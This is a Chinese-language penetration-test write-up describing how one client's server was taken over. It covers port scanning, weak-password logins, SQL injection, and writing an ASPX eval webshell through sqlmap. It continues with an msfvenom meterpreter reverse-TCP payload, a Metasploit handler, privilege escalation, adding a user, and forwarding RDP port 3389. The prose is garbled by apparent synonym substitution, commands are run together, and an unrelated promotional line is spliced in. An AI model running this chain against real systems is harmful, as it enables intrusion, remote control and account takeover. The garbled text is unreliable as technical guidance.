在本次做网站
渗透测试新项目时,顾客只出示了一个IP。做为小白的我刚开始启航。
对信息内容搜集
Nmap扫描仪一下端口号,留意扫描仪上位端口号,通常有意外的惊喜。
弱动态口令试着登陆。
简易归纳一下。
系统漏洞检测
登陆进后台管理检测发觉2个系统软件均存有sql引入。
还要8000端口号上的crocus系统软件中寻找一处随意压缩文件下载系统漏洞。
原先是系统日志免费下载。点一下发觉网页页面中存有绝对路径。
OK!!!搜集一下绝对路径。
如今的构思是:
在有绝对路径的前提条件下,相互配合sql引入,运用sqlmap的—sql-shell试着能够写一句话木马。
漏洞利用
细心看这一绝对路径。据说细心盯住它看会有神效。(笑)
WCMS4.0这一仿佛在哪儿见过。
没有错。就是说12055端口号,登陆后台管理
能够运用这一后台管理的sql引入来写shell。
sql引入点大约在检索部位。
网站安全防御2020的安全加固解决办法分享
阻拦数据文件,储存为post.txt。应用sqlmap刚开始引入。
有引入,有dba管理权限,有绝对路径。shell一条龙从此提前准备。
Webshell
刚开始载入aspx一句话木马。
select'<%@PageLanguage="Javascript"%><%eval(Request.Item["pass"]);%>'INTOOUTFILE'C://ProgramFiles(x86)//CMSServer//WCMS4.0//x.aspx'
没问题,浏览一下。
Nice!!!
水果刀联接。
操纵网络服务器
先搜集一下该网络服务器的信息内容
该网络服务器运作以内网,这儿挑选应用msf马反跳shell后开展端口转发。
有关怎样出外网打造出一台metasploit。
转化成msf马
msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=xx.xx.xx.xxLPORT=2333-fexe>road.exe
xx.xx.xx.xx为内网ip网络服务器
2333为内网ip端口号
将转化成的msf马根据中国菜刀提交至肉食鸡。
外网地址metasploit刚开始配备监视
useexploit/multi/handle
setpayload
windows/x64/meterpreter/reverse_tcp
setlhost127.0.0.1
run
简易实行几个meterpreter指令
getuid当今管理权限
getsystem开展提权
rungetgui-uxxxxx-pxxxxx
在总体目标设备上加上客户
portfwdadd-l3389-r192.168.1.18-p3389
将3389端口转发至当地
端口转发联接当地的3389
小结
此次新项目取得成功getshell关键运用了上位端口扫描、弱动态口令、SQL引入、压缩文件下载系统漏洞。愿每一次渗透测试都是碰到不一样的自己。